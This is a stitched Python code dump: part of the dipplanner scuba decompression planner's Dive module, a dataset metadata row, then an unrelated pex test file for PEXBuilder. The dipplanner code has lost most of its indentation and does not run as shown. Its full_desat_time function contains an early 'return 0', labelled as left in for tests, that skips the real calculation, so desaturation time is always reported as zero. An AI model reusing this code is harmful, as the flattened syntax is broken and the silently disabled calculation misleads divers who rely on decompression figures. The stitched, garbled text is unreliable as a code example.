"""Raised when the is no input segments to process."""
def __init__(self, description=""):
"""Init of the Exception.
:param str description: text describing the error
"""
super().__init__(description)
self.logger.error(
"Raising an exception: NothingToProcess ! (%s)", description)
class InstanciationError(DipplannerException):
"""Raised when the Dive constructor encounters a problem.
In this case, it can not continue
"""
def __init__(self, description=""):
"""Init of the Exception.
:param str description: text describing the error
"""
super().__init__(description)
self.logger.error(
"Raising an exception: InstanciationError ! (%s)", description)
class ProcessingError(DipplannerException):
"""Raised when the is no input segments to process."""
def __init__(self, description=""):
"""Init of the Exception.
:param str description: text describing the error
"""
super().__init__(description)
self.logger.error(
"Raising an exception: ProcessingError ! (%s)", description)
class InfiniteDeco(DipplannerException):
"""Raised when the deco time becomes enourmous (like infinite)."""
def __init__(self, description=""):
"""Init of the Exception.
:param str description: text describing the error
"""
super().__init__(description)
self.logger.error(
"Raising an exception: InfiniteDeco ! (%s)", description)
class Dive():
"""Conducts dive based on inputSegments, knownGases, and an existing model.
Iterates through dive segments updating the Model. When all
dive segments are processed then calls ascend(0.0) to
return to the surface.
    The previous_profile (Model) can be either None, in which case a
new model is created, or can be an existing model with tissue loadings.
Gas switching is done on the final ascent if OC deco or
bailout is specified.
Outputs profile to a List of dive segments
Attributes:
* input_segments -- (list) Stores enabled input dive segment objects
* output_segments -- (list) Stores output segments produced by this class
* tanks -- (list) Stores enabled dive tank objects
* current_tank -- current tank object
* current_depth -- current dive depth
* ambiant_pressure -- (current) ambiant pressure
* current_f_he -- current gas fraction of He
* current_f_n2 -- current gas fraction of N2
* current_f_o2 -- current gas fraction of O2
* model -- model used for this dive
* run_time -- runTime
* pp_o2 -- CCR ppO2, if OC : 0.0
* is_closed_circuit -- Flag to store CC or OC
* in_final_ascent -- flag for final ascent
    * is_repetitive_dive -- Flag for repetitive dives
* surface_interval -- for surf. int. in seconds
* no_flight_time_value -- calculated no flight time
* metadata -- description for the dive
"""
def __init__(self, known_segments, known_tanks, previous_profile=None):
"""Init for Dive class.
        For the first dive, instantiate the profile class with no model
        (profile will create one for you)
        For repetitive dives, instantiate the profile class with the
        previous model
:param known_segments: -- list of input segments
:type known_segments: list of :class:`dipplanner.segment.Segment`
:param known_tanks: list of tanks for this dive
:type known_tanks: list of :class:`dipplanner.tank.Tank`
:param previous_profile: model object of the precedent dive
:type previous_profile: :class:`dipplanner.model`
        .. note:: the initialisation should not fail. If something is wrong, it
            MUST still instantiate itself, with errors stored in its own object
"""
# initiate class logger
self.logger = logging.getLogger("dipplanner.dive.Dive")
self.logger.debug("creating an instance of Dive")
# initiate dive exception list
self.dive_exceptions = []
if previous_profile is None:
# new dive : new model
self.is_repetitive_dive = False
try:
self.model = BuhlmannModel() # buhlman model by default
except DipplannerException as exc:
self.dive_exceptions.append(
InstanciationError(
"Unable to instanciate model: %s" % exc))
self.metadata = ""
else:
# repetative dive
self.is_repetitive_dive = True
self.model = previous_profile.model
try:
self.model.init_gradient()
except DipplannerException as exc:
self.dive_exceptions.append(
InstanciationError(
"Unable to reset model gradients: %s" % exc))
# filter input segment for only enabled segments
self.input_segments = []
try:
for segment in known_segments:
if segment.in_use:
self.input_segments.append(segment)
except DipplannerException as exc:
self.dive_exceptions.append(
InstanciationError("Problem while adding segments: %s" % exc))
# filter lists of gases to make the used list of gases
self.tanks = []
try:
for tank in known_tanks:
if tank.in_use:
self.tanks.append(tank)
except DipplannerException as exc:
self.dive_exceptions.append(
InstanciationError("Problem while adding tanks: %s" % exc))
# initalise output_segment list
self.output_segments = []
# other initialisations
self.surface_interval = 0
self.no_flight_time_value = None
self.full_desat_time_value = None
self.is_closed_circuit = False # OC by default
self.pp_o2 = 0.0 # OC by default
self.current_tank = None
self.current_depth = 0.0
self.in_final_ascent = False
self.run_time = 0 # in second
self.metadata = ""
def __repr__(self):
"""Return a str representing the result of the dive.
Using the default template
:returns: a string with the result of the calculation of the dives
using the default template
:rtype: str
"""
return self.output("default.tpl")
def __str__(self):
"""Return a str representing the result of the dive.
Using the default template
:returns: a string with the result of the calculation of the dives
using the default template
:rtype: str
"""
return self.__repr__()
# def __cmp__(self, otherdive):
# """Compare a dive to another dive, based on run_time
# *Keyword arguments:*
# otherdive (Dive) -- another dive object
# *Returns:*
# Integer -- result of cmp()
# *Raise:*
# <nothing>
# """
# return cmp(self.run_time, otherdive.run_time)
def output(self, template=None):
"""Return the dive profile calculated.
using the template given in settings or command lines.
(and not only the default template)
:returns: a string with the result of the calculation of the dives
using the choosen template
:rtype: str
"""
env = Environment(loader=PackageLoader('dipplanner', 'templates'))
if template is None:
tpl = env.get_template(settings.TEMPLATE)
else:
tpl = env.get_template(template)
# pylint: disable=no-member
text = tpl.render(settings=settings,
dives=[self, ])
# pylint: enable=no-member
return text
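    # For example, dive.output("default.tpl") renders this dive with the
    # default Jinja2 template shipped in dipplanner/templates, while calling
    # output() with no argument uses the template named in settings.TEMPLATE.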
def do_surface_interval(self, time):
"""Conduct a surface interval.
        It performs a constant depth calculation on air at zero meters.
:param int time: duration of the interval, in seconds
"""
try:
self.model.const_depth(pressure=0.0, seg_time=time,
f_he=0.0, f_n2=0.79, pp_o2=0.0)
except DipplannerException as exc:
self.dive_exceptions.append(
ModelException("Unable to do surface interval: %s" % exc))
self.surface_interval = time
if settings.AUTOMATIC_TANK_REFILL:
self.refill_tanks()
def get_surface_interval(self):
"""Return surface interval in mm:ss format.
:returns: surface interval time in mmm:ss format
:rtype: str
"""
return seconds_to_mmss(self.surface_interval)
def refill_tanks(self):
"""refile all tanks defined in this dive.
it is used for repetitive dives
"""
for tank in self.tanks:
tank.refill()
def is_dive_segments(self):
"""Return true if there are loaded dive segments.
else false means there is nothing to process
:returns: True -- if there is at least one input
dive segment to process
False -- if there is no dive segment to process
:rtype: bool
"""
        return len(self.input_segments) > 0
def do_dive_without_exceptions(self):
"""Call do_dive, and handle exceptions internally.
do not raise any "dive related" exception : add the exception inside
self.dive_exceptions instead.
"""
try:
self.do_dive()
except DipplannerException as exc:
self.dive_exceptions.append(exc)
except Exception as exc: # unknown generic exception
self.dive_exceptions.append(
DipplannerException("Unknown exception occured: %s" % exc))
def do_dive(self):
"""Process the dive.
:raises NothingToProcess: if there is no input segment to process
:raises ModelException: <Exceptions from model>
"""
if self.is_dive_segments() is False:
raise NothingToProcess
# check the segments:
for seg in self.input_segments:
seg.check()
run_time_flag = settings.RUN_TIME
# sets initial state
#
# else:
first_segment = self.input_segments[0]
self.current_tank = first_segment.tank
# Sort self.tanks based on MOD ? why ? see below ?
self.tanks.sort()
self.current_depth = 0.0
self.pp_o2 = first_segment.setpoint
if self.pp_o2 == 0.0:
self.is_closed_circuit = False
else:
self.is_closed_circuit = True
self.in_final_ascent = False
        # check if the tank for the first segment is suitable for descent (OC mode)
if (not self.is_closed_circuit and
self.input_segments[0].tank.get_min_od() > 0):
# tank is not ok, we need to look for another better tank
# at first, try to find a tank suitable
# from 0m to depth of first segment
self.logger.debug("bottom gaz not ok for descent")
self.tanks.reverse()
for tank in self.tanks:
if tank.get_min_od() == 0:
self.logger.debug(
"This tank may be suitable:%s, mod:%s, end at d:%s",
str(tank), tank.mod, tank.get_end_for_given_depth(
self.input_segments[0].depth))
if (tank.mod >= self.input_segments[0].depth and
tank.get_end_for_given_depth(
self.input_segments[0].depth) <
settings.DEFAULT_MAX_END):
# ok we have a winner
self.logger.info(
"Changed tank for descent to:%s", str(tank))
self.current_tank = tank
break
if self.current_tank == self.input_segments[0].tank:
# not found : we need to stop in the descent
# to switch from first gas
# to bottom gas
self.logger.debug("No directly usage tank found,"
" try to stop and change tank")
for tank in self.tanks:
if tank.get_min_od() == 0:
self.logger.debug(
"This tank may be suitable:%s, "
"mod:%s, end at d:%s",
str(tank),
tank.mod,
tank.get_end_for_given_depth(
self.input_segments[0].depth))
if settings.TRAVEL_SWITCH == 'late':
depth = min(tank.mod, tank.get_mod_for_given_end(
settings.DEFAULT_MAX_END))
self.input_segments.insert(0, SegmentDive(
depth=depth,
tank=self.input_segments[0].tank,
time=0))
self.input_segments.insert(0, SegmentDive(
depth=depth, tank=tank, time=0))
self.current_tank = tank
break
else: # early
depth = self.input_segments[0].tank.get_min_od(
min_ppo2=settings.DEFAULT_MIN_PPO2)
self.input_segments.insert(0, SegmentDive(
depth=depth,
tank=self.input_segments[0].tank,
time=0))
self.input_segments.insert(0, SegmentDive(
depth=depth, tank=tank, time=0))
self.current_tank = tank
break
self.tanks.sort()
for seg in self.input_segments:
if seg.type == 'const': # only dive segment allowed for input
delta_depth = float(seg.depth) - float(self.current_depth)
# Ascend or descend to dive segment,
# using existing gas and ppO2 settings
if delta_depth > 0.0: # descent
self.model.asc_desc(depth_to_pressure(self.current_depth),
depth_to_pressure(seg.depth),
settings.DESCENT_RATE,
self.current_tank.f_he,
self.current_tank.f_n2,
self.pp_o2)
self.output_segments.append(
SegmentAscDesc(self.current_depth,
seg.depth,
settings.DESCENT_RATE,
self.current_tank,
self.pp_o2))
self.run_time += abs(float(delta_depth) /
(float(settings.DESCENT_RATE)))
self.logger.debug("descent time : %ss",
float(delta_depth) /
settings.DESCENT_RATE)
else: # ascent
# call ascend method of this class
# for decompression calculation
self.ascend(seg.depth)
# we are now at the desired depth : process the dive segment
self.current_depth = seg.depth # new depth
self.pp_o2 = seg.setpoint
self.current_tank = seg.tank
if seg.time > 0: # only do this if it's not a waypoint
if run_time_flag:
run_time_flag = False # do this one only
self.model.const_depth(depth_to_pressure(seg.depth),
seg.time - self.run_time,
self.current_tank.f_he,
self.current_tank.f_n2,
self.pp_o2)
self.output_segments.append(
SegmentDive(seg.depth,
seg.time - self.run_time,
self.current_tank,
self.pp_o2))
self.metadata += "Dive to %s for %ss\n" % (
seg.depth, seg.time - self.run_time)
self.logger.debug("Dive to %s for %ss",
seg.depth,
seg.time - self.run_time)
# run_time = seg_time because it's
# only done the first time
self.run_time = seg.time
self.logger.debug(
"update run time : %ss", self.run_time)
else:
self.model.const_depth(depth_to_pressure(seg.depth),
seg.time,
self.current_tank.f_he,
self.current_tank.f_n2,
self.pp_o2)
self.output_segments.append(
SegmentDive(seg.depth,
seg.time,
self.current_tank,
self.pp_o2))
self.metadata += "Dive to %s for %ss\n" % (seg.depth,
seg.time)
self.logger.debug("Dive to %s for %ss",
seg.depth, seg.time)
self.run_time += seg.time
self.logger.debug("update run time : %ss",
self.run_time)
else: # process waypoint
self.output_segments.append(
SegmentDive(seg.depth,
seg.time,
self.current_tank,
self.pp_o2))
        # all input segments are now processed: proceed to ascend to the surface
self.in_final_ascent = True
# ascend to the surface
self.ascend(0.0)
# for each output segment, recalculate runtime and update segments
total_time = 0
for output_seg in self.output_segments:
total_time += output_seg.time
output_seg.run_time = total_time
if total_time != self.run_time:
self.logger.warning("dive run_time (%ss) differs from"
" all segments time (%ss)",
self.run_time, total_time)
# write metadata into the model
self.model.metadata = self.metadata
# recalculate the gas consumptions
self.do_gas_calcs()
# save the tanks parameters : next dives may use the same tanks,
# but we need here to duplicate tank object within this dive in
# order to save the tank parameters for this dive only
saved_tanks = []
for tank in self.tanks:
saved_tanks.append(copy.deepcopy(tank))
self.tanks = saved_tanks
def get_no_flight_hhmmss(self):
"""Return no flight time (if calculated) in hhmmss format.
instead of an int in seconds
.. note::
This method does not calculate no_flight_time
you need to call no_flight_time() or
no_flight_time_wo_exception() before.
:returns: "hh:mm:ss" no flight time
"" (empty string) if no flight time is not calculated
:rtype: str
"""
if self.no_flight_time_value is not None:
return seconds_to_hhmmss(self.no_flight_time_value)
else:
return ""
def no_flight_time_wo_exception(self,
altitude=settings.FLIGHT_ALTITUDE,
tank=None):
"""Call no_flight_time, and handle exceptions internally.
do not raise any "dive related" exception: add the
exception inside self.dive_exceptions instead.
:param int altitude: in meter : altitude used for the calculation
:param float flight_ascent_rate: in m/s
        :param tank: [optional]
it is possible to provide a tank while calling
no_flight_time to force "no flight deco" with
another mix than air.
In this case, we will 'consume' the tank
            When the tank is empty, it automatically switches to air
:type tank: :class:`dipplanner.tank.Tank`
        :returns: no flight time in seconds
:rtype: int
"""
try:
result = self.no_flight_time(altitude, tank)
except DipplannerException as exc:
self.dive_exceptions.append(exc)
except Exception as exc: # unknown generic exception
self.dive_exceptions.append(
DipplannerException("Unknown exception occured: %s" % exc))
else:
return result
def no_flight_time(self, altitude=settings.FLIGHT_ALTITUDE, tank=None):
"""Evaluate the no flight time.
        by 'ascending' to the chosen flight altitude.
Ascending will generate the necessary 'stop' at the current depth
(which is 0m) .
The stop time represents the no flight time
:param int altitude: in meter : altitude used for the calculation
        :param float flight_ascent_rate: in m/s
        :param tank: (optional)
it is possible to provide a tank while calling
no_flight_time to force "no flight deco" with
another mix than air.
In this case, we will 'consume' the tank
            When the tank is empty, it automatically switches to air
:type tank: :class:`dipplanner.tank.Tank`
        :returns: no flight time in seconds
:rtype: int
:raises InfiniteDeco: if the no flight time can not achieve enough
            decompression to be able to go to the given altitude
"""
no_flight_time = 0
deco_uses_tank = False # set to true when deco is using a tank
# need to change gaz to air:
# create a 'dummy' air tank
no_flight_air_tank = Tank(
tank_vol=settings.ABSOLUTE_MAX_TANK_SIZE,
tank_pressure=settings.ABSOLUTE_MAX_TANK_PRESSURE,
tank_rule="30b")
if tank is not None:
no_flight_tank = tank
deco_uses_tank = True
self.logger.info("Accelerating no flight"
"time using a tank:%s", tank)
else:
no_flight_tank = no_flight_air_tank
next_stop_pressure = altitude_or_depth_to_absolute_pressure(altitude)
# bigger stop time to speed up calculation
        # (precision is not necessary here)
stop_time = 60 # in second -
model_copy = copy.deepcopy(self.model)
model_ceiling = model_copy.ceiling_in_pabs()
while model_ceiling > next_stop_pressure:
# loop for "deco" calculation based on the new ceiling
model_copy.const_depth(0.0,
stop_time,
no_flight_tank.f_he, # f_he
no_flight_tank.f_n2, # f_n2
0.0) # ppo2 (for cc)
no_flight_time += stop_time
model_ceiling = model_copy.ceiling_in_pabs()
if deco_uses_tank:
if no_flight_tank.remaining_gas <= 0:
no_flight_tank = no_flight_air_tank
deco_uses_tank = False
self.logger.info("Tank used for accelerating "
"no flight time is empty, "
"swithing to air at %s s",
no_flight_time)
else:
no_flight_tank.consume_gas(
settings.DECO_CONSUMPTION_RATE * stop_time)
if no_flight_time > 300000:
raise InfiniteDeco("Infinite deco error")
self.no_flight_time_value = no_flight_time
return no_flight_time
def get_full_desat_hhmmss(self):
"""Return full desat time (if calculated) in hhmmss format.
instead of an int in seconds
:returns: "hh:mm:ss" full desat time
:rtype: str
"""
if self.full_desat_time_value is not None:
return seconds_to_hhmmss(self.full_desat_time_value)
else:
return seconds_to_hhmmss(self.full_desat_time())
def full_desat_time(self):
"""Evaluate the full desat time.
        By doing deco at const depth of 0m until all compartments
are (nearly) empty.
Because of compartments halftimes, full desat is never really achieved.
So we need to setup an arbitrary "margin": when sur-saturation falls
        below this margin, we consider that the compartment is not saturated
anymore.
:returns: full desat time in seconds
:rtype: int
:raises InfiniteDeco: if the no flight time can not achieve enough
decompression to be able to go to give altitude
"""
        # TODO: early return left in place for tests; it skips the full calculation below
return 0
full_desat_time = 0
margin = 0.01 + calculate_pp_h2o_surf(settings.SURFACE_TEMP)
# bigger stop time to speed up calculation
# (precision is not necesary here)
stop_time = 60 # in second
model_copy = copy.deepcopy(self.model)
full_desat = False
while not full_desat:
# loop for "deco" calculation based on the new ceiling
model_copy.const_depth(pressure=0.0,
seg_time=stop_time,
f_he=0.0,
f_n2=settings.DEFAULT_AIR_FN2,
pp_o2=0.0)
full_desat_time += stop_time
if full_desat_time > 300000:
raise InfiniteDeco("Infinite deco error")
full_desat = True
for comp in model_copy.tissues:
if (comp.pp_n2 > settings.DEFAULT_AIR_FN2 + margin or
comp.pp_he > margin):
full_desat = False
break
self.full_desat_time_value = full_desat_time
return full_desat_time
def ascend(self, target_depth):
"""Ascend to target depth, decompressing if necessary.
If inFinalAscent then gradient factors start changing,
and automatic gas selection is made.
This method is called by do_dive()
:param float target_depth: in meter, target depth for the ascend
:raises ModelException: <Exceptions from model>
"""
force_deco_stop = False
in_deco_cycle = False
deco_stop_time = 0
if self.in_final_ascent and settings.USE_OC_DECO:
self.set_deco_gas(self.current_depth)
if self.current_depth < target_depth:
# going backwards !
raise ProcessingError("Not allowed to ascend while descending !")
# Set initial stop to be the next integral stop depth
if self.current_depth % settings.STOP_DEPTH_INCREMENT > 0:
# we are not on a stop depth already : go to the next stop depth
next_stop_depth = (int(self.current_depth /
settings.STOP_DEPTH_INCREMENT) *
settings.STOP_DEPTH_INCREMENT)
else:
next_stop_depth = int(self.current_depth -
settings.STOP_DEPTH_INCREMENT)
self.logger.debug("next_stop_depth: %s", next_stop_depth)
# hack in case we are overshooting or hit last stop or any of
        # the other bizarre combinations ...
if (next_stop_depth < target_depth or
self.current_depth < settings.LAST_STOP_DEPTH):
next_stop_depth = target_depth
self.logger.debug("new next_stop_depth: %s", next_stop_depth)
elif next_stop_depth == settings.LAST_STOP_DEPTH:
self.logger.warning("next_stop_depth==LAST_STOP_DEPTH !")
next_stop_depth = target_depth
self.logger.debug("new next_stop_depth: %s", next_stop_depth)
elif next_stop_depth < settings.LAST_STOP_DEPTH:
next_stop_depth = settings.LAST_STOP_DEPTH
self.logger.debug("new next_stop_depth: %s", next_stop_depth)
# Initialise ascent segment start depth
start_depth = self.current_depth
in_ascent_cycle = True # Start in free ascent
# Initialise gradient factor for next (in this case first) stop depth
self.model.gradient.set_gf_at_depth(next_stop_depth)
# Remember maxM-Value and controlling compartment
max_mv = self.model.m_value(depth_to_pressure(self.current_depth))
control = self.model.control_compartment()
while self.current_depth > target_depth:
self.logger.debug("ascent from: %s, to: %s",
self.current_depth, next_stop_depth)
# can we move to the proposed next stop depth ?
model_ceiling = self.model.ceiling()
self.logger.debug("model ceiling: %s", model_ceiling)
while force_deco_stop or next_stop_depth < model_ceiling:
in_deco_cycle = True
# Only used for first entry into deco stop
force_deco_stop = False
if in_ascent_cycle:
                    # Finalise last ascent cycle as we are now decompressing
if start_depth > self.current_depth:
# add ascent segment
self.logger.debug("Add AscDesc(1): start_depth:%s "
"current_depth:%s",
start_depth, self.current_depth)
self.output_segments.append(
SegmentAscDesc(start_depth,
self.current_depth,
settings.ASCENT_RATE,
self.current_tank,
self.pp_o2))
in_ascent_cycle = False
# set m-value gradient under the following conditions:
# - if not in multilevel mode, then set it as soon as
# we do a decompression cycle
# - otherwise wait until we are finally
# surfacing before setting it
if ((not settings.MULTILEVEL_MODE or self.in_final_ascent) and
(not self.model.gradient.gf_set)):
self.model.gradient.set_gf_slope_at_depth(
self.current_depth)
self.model.gradient.set_gf_at_depth(next_stop_depth)
self.logger.debug("...set m-value gradient: %s",
self.model.gradient.gf)
# calculate stop_time
# if (deco_stop_time == 0 and
# self.run_time % settings.STOP_TIME_INCREMENT > 0):
# stop_time = (
# int(self.run_time / settings.STOP_TIME_INCREMENT) *
# settings.STOP_TIME_INCREMENT +
# settings.STOP_TIME_INCREMENT - self.run_time)
# print("+++++ ", stop_time)
# if stop_time == 0:
# stop_time = settings.STOP_TIME_INCREMENT # in second
# else:
stop_time = settings.STOP_TIME_INCREMENT # in second
# execute the stop
self.model.const_depth(depth_to_pressure(self.current_depth),
stop_time,
self.current_tank.f_he,
self.current_tank.f_n2,
self.pp_o2)
deco_stop_time += stop_time
# sanity check for infinite loop
if deco_stop_time > 300000:
raise InfiniteDeco("Infinite deco error")
model_ceiling = self.model.ceiling()
# finished decompression loop
if in_deco_cycle:
self.logger.debug("...in deco cycle")
# finalise the last deco cycle
self.run_time += deco_stop_time
self.logger.debug(
"update run time with deco time: %ss at %sm (runtime:%s)",
deco_stop_time, self.current_depth, self.run_time)
if settings.FORCE_ALL_STOPS:
force_deco_stop = True
# write deco segment
deco_segment = SegmentDeco(self.current_depth,
deco_stop_time,
self.current_tank,
self.pp_o2)
deco_segment.mv_max = max_mv
deco_segment.gf_used = self.model.gradient.gf
deco_segment.control_compartment = control
self.output_segments.append(deco_segment)
in_deco_cycle = False
deco_stop_time = 0
if in_ascent_cycle:
self.logger.debug("...in ascent cycle, do asc from %s to %s",
self.current_depth, next_stop_depth)
self.model.asc_desc(depth_to_pressure(self.current_depth),
depth_to_pressure(next_stop_depth),
-settings.ASCENT_RATE,
self.current_tank.f_he,
self.current_tank.f_n2,
self.pp_o2)
self.run_time += abs((float(self.current_depth) -
float(next_stop_depth)) /
float(settings.ASCENT_RATE))
self.logger.debug("update run time : %ss", self.run_time)
else:
self.logger.debug("...in deco cycle, do asc from %s to %s",
self.current_depth, next_stop_depth)
self.model.asc_desc(depth_to_pressure(self.current_depth),
depth_to_pressure(next_stop_depth),
-settings.DECO_ASCENT_RATE,
self.current_tank.f_he,
self.current_tank.f_n2,
self.pp_o2)
self.run_time += abs((float(self.current_depth) -
float(next_stop_depth)) /
float(settings.DECO_ASCENT_RATE))
self.logger.debug("update run time : %ss", self.run_time)
self.output_segments.append(
SegmentAscDesc(self.current_depth,
next_stop_depth,
settings.DECO_ASCENT_RATE,
self.current_tank,
self.pp_o2))
            # now we have moved up to the next depth
self.current_depth = next_stop_depth
max_mv = self.model.m_value(depth_to_pressure(self.current_depth))
control = self.model.control_compartment()
# Check and switch deco gas
temp_tank = self.current_tank # remember in case we switch
if self.set_deco_gas(self.current_depth): # True if we changed gas
if in_ascent_cycle:
self.logger.debug("Add AscDesc(2): start_depth:%s, "
"current_depth:%s",
start_depth, self.current_depth)
self.output_segments.append(
SegmentAscDesc(start_depth,
self.current_depth,
settings.ASCENT_RATE,
temp_tank,
self.pp_o2))
start_depth = self.current_depth
# set next rounded stop depth
next_stop_depth = int(
self.current_depth) - settings.STOP_DEPTH_INCREMENT
self.logger.debug("next stop depth: %s, target depth: %s",
next_stop_depth, target_depth)
            # check in case we are overshooting or hit the last stop
if (next_stop_depth < target_depth or
self.current_depth < settings.LAST_STOP_DEPTH):
self.logger.debug("next_stop_depth (%s) < target_depth (%s)",
next_stop_depth, target_depth)
next_stop_depth = target_depth
elif self.current_depth < settings.LAST_STOP_DEPTH:
self.logger.debug("current_depth (%s) < LAST_STOP_DEPTH (%s)",
self.current_depth,
settings.LAST_STOP_DEPTH)
next_stop_depth = target_depth
elif (next_stop_depth < settings.LAST_STOP_DEPTH and
next_stop_depth > 0):
self.logger.debug("next_stop_depth (%s) < "
"settings.LAST_STOP_DEPTH (%s)",
next_stop_depth, settings.LAST_STOP_DEPTH)
next_stop_depth = target_depth
if self.model.gradient.gf_set: # update gf for next stop
self.model.gradient.set_gf_at_depth(next_stop_depth)
# are we still in ascent segment ?
if in_ascent_cycle:
self.logger.debug("Add AscDesc(3): start_depth:%s, "
"current_depth:%s",
start_depth, self.current_depth)
self.output_segments.append(
SegmentAscDesc(start_depth,
self.current_depth,
-settings.ASCENT_RATE,
self.current_tank,
self.pp_o2))
def do_gas_calcs(self):
"""Estimate gas consumption for all output segments.
and set this into the respective gas objects
:raises InvalidGas: <Exceptions from tank>
:raises InvalidTank: <Exceptions from tank>
:raises InvalidMod: <Exceptions from tank>
:raises EmptyTank: <Exceptions from tank>
"""
for seg in self.output_segments:
seg.tank.consume_gas(seg.gas_used)
def set_deco_gas(self, depth):
"""Select appropriate deco gas for the depth specified.
        Returns True if a gas switch occurred
:param float depth: target depth to make the choice
        :returns: True -- if a gas switch occurred
                  False -- if no gas switch occurred
:rtype: bool
:raises InvalidGas: <Exceptions from tank>
:raises InvalidTank: <Exceptions from tank>
:raises InvalidMod: <Exceptions from tank>
:raises EmptyTank: <Exceptions from tank>
"""
gas_switch = False
# check to see if we should be changing gases at all ...
        # if not, just return without doing anything
if not self.in_final_ascent:
return False
if not settings.USE_OC_DECO:
return False
if len(self.tanks) == 0:
return False
# check and switch deco gases
current_tank_sav = self.current_tank
for temp_tank in self.tanks:
if (temp_tank.get_mod() >= depth and
temp_tank.get_min_od() < depth):
# authorised tank at this depth
if temp_tank < current_tank_sav:
if self.is_closed_circuit:
# only change from CC to OC when a valid tank
# for deco is available
self.pp_o2 = False
self.is_closed_circuit = False
self.current_tank = temp_tank
gas_switch = True
self.logger.info("Changing gas from %s (mod:%s)"
"to %s (mod:%s)",
current_tank_sav,
current_tank_sav.get_mod(),
self.current_tank,
self.current_tank.get_mod())
# else:
# break
return gas_switch
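# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): the docstrings above
# describe the intended call sequence for planning a dive.  The Tank and
# SegmentDive constructor arguments below are assumptions for the example --
# only the Dive calls mirror the API documented in this class.
def _plan_single_dive_example(depth=40.0, bottom_time=20 * 60):
    air = Tank()                                   # assumed: defaults give an air tank
    bottom = SegmentDive(depth=depth, tank=air, time=bottom_time)
    dive = Dive([bottom], [air])                   # assumed signature: (segments, tanks)
    dive.do_dive_without_exceptions()              # errors end up in dive.dive_exceptions
    if dive.dive_exceptions:
        return dive.dive_exceptions
    # dive.no_flight_time_wo_exception() would then give the no-fly delay in seconds
    return dive.output()                           # rendered with the default template
# ---------------------------------------------------------------------------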
| gpl-3.0 | -5,919,731,483,727,860,000 | 41.272374 | 79 | 0.51933 | false | 4.407749 | false | false | false |
kwlzn/pex | tests/test_pex_builder.py | 1 | 5519 | # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import os
import stat
import pytest
from twitter.common.contextutil import temporary_dir
from twitter.common.dirutil import safe_mkdir
from pex.common import open_zip
from pex.compatibility import WINDOWS, nested
from pex.pex import PEX
from pex.pex_builder import PEXBuilder
from pex.testing import make_bdist
from pex.testing import write_simple_pex as write_pex
from pex.util import DistributionHelper
exe_main = """
import sys
from my_package.my_module import do_something
do_something()
with open(sys.argv[1], 'w') as fp:
fp.write('success')
"""
wheeldeps_exe_main = """
import sys
from pyparsing import *
from my_package.my_module import do_something
do_something()
with open(sys.argv[1], 'w') as fp:
fp.write('success')
"""
def test_pex_builder():
# test w/ and w/o zipfile dists
with nested(temporary_dir(), make_bdist('p1', zipped=True)) as (td, p1):
write_pex(td, exe_main, dists=[p1])
success_txt = os.path.join(td, 'success.txt')
PEX(td).run(args=[success_txt])
assert os.path.exists(success_txt)
with open(success_txt) as fp:
assert fp.read() == 'success'
# test w/ and w/o zipfile dists
with nested(temporary_dir(), temporary_dir(), make_bdist('p1', zipped=True)) as (
td1, td2, p1):
target_egg_dir = os.path.join(td2, os.path.basename(p1.location))
safe_mkdir(target_egg_dir)
with open_zip(p1.location, 'r') as zf:
zf.extractall(target_egg_dir)
p1 = DistributionHelper.distribution_from_path(target_egg_dir)
write_pex(td1, exe_main, dists=[p1])
success_txt = os.path.join(td1, 'success.txt')
PEX(td1).run(args=[success_txt])
assert os.path.exists(success_txt)
with open(success_txt) as fp:
assert fp.read() == 'success'
def test_pex_builder_wheeldep():
"""Repeat the pex_builder test, but this time include an import of
something from a wheel that doesn't come in importable form.
"""
with nested(temporary_dir(), make_bdist('p1', zipped=True)) as (td, p1):
pyparsing_path = "./tests/example_packages/pyparsing-2.1.10-py2.py3-none-any.whl"
dist = DistributionHelper.distribution_from_path(pyparsing_path)
write_pex(td, wheeldeps_exe_main, dists=[p1, dist])
success_txt = os.path.join(td, 'success.txt')
PEX(td).run(args=[success_txt])
assert os.path.exists(success_txt)
with open(success_txt) as fp:
assert fp.read() == 'success'
def test_pex_builder_shebang():
def builder(shebang):
pb = PEXBuilder()
pb.set_shebang(shebang)
return pb
for pb in builder('foobar'), builder('#!foobar'):
for b in pb, pb.clone():
with temporary_dir() as td:
target = os.path.join(td, 'foo.pex')
b.build(target)
expected_preamble = b'#!foobar\n'
with open(target, 'rb') as fp:
assert fp.read(len(expected_preamble)) == expected_preamble
def test_pex_builder_preamble():
with temporary_dir() as td:
target = os.path.join(td, 'foo.pex')
should_create = os.path.join(td, 'foo.1')
tempfile_preamble = "\n".join([
"import sys",
"open('{0}', 'w').close()".format(should_create),
"sys.exit(3)"
])
pex_builder = PEXBuilder(preamble=tempfile_preamble)
pex_builder.build(target)
assert not os.path.exists(should_create)
pex = PEX(target)
process = pex.run(blocking=False)
process.wait()
assert process.returncode == 3
assert os.path.exists(should_create)
def test_pex_builder_compilation():
with nested(temporary_dir(), temporary_dir(), temporary_dir()) as (td1, td2, td3):
src = os.path.join(td1, 'src.py')
with open(src, 'w') as fp:
fp.write(exe_main)
exe = os.path.join(td1, 'exe.py')
with open(exe, 'w') as fp:
fp.write(exe_main)
def build_and_check(path, precompile):
pb = PEXBuilder(path)
pb.add_source(src, 'lib/src.py')
pb.set_executable(exe, 'exe.py')
pb.freeze(bytecode_compile=precompile)
for pyc_file in ('exe.pyc', 'lib/src.pyc', '__main__.pyc'):
pyc_exists = os.path.exists(os.path.join(path, pyc_file))
if precompile:
assert pyc_exists
else:
assert not pyc_exists
bootstrap_dir = os.path.join(path, PEXBuilder.BOOTSTRAP_DIR)
bootstrap_pycs = []
for _, _, files in os.walk(bootstrap_dir):
bootstrap_pycs.extend(f for f in files if f.endswith('.pyc'))
if precompile:
assert len(bootstrap_pycs) > 0
else:
assert 0 == len(bootstrap_pycs)
build_and_check(td2, False)
build_and_check(td3, True)
@pytest.mark.skipif(WINDOWS, reason='No hardlinks on windows')
def test_pex_builder_copy_or_link():
with nested(temporary_dir(), temporary_dir(), temporary_dir()) as (td1, td2, td3):
src = os.path.join(td1, 'exe.py')
with open(src, 'w') as fp:
fp.write(exe_main)
def build_and_check(path, copy):
pb = PEXBuilder(path, copy=copy)
pb.add_source(src, 'exe.py')
path_clone = os.path.join(path, '__clone')
pb.clone(into=path_clone)
for root in path, path_clone:
s1 = os.stat(src)
s2 = os.stat(os.path.join(root, 'exe.py'))
is_link = (s1[stat.ST_INO], s1[stat.ST_DEV]) == (s2[stat.ST_INO], s2[stat.ST_DEV])
if copy:
assert not is_link
else:
assert is_link
build_and_check(td2, False)
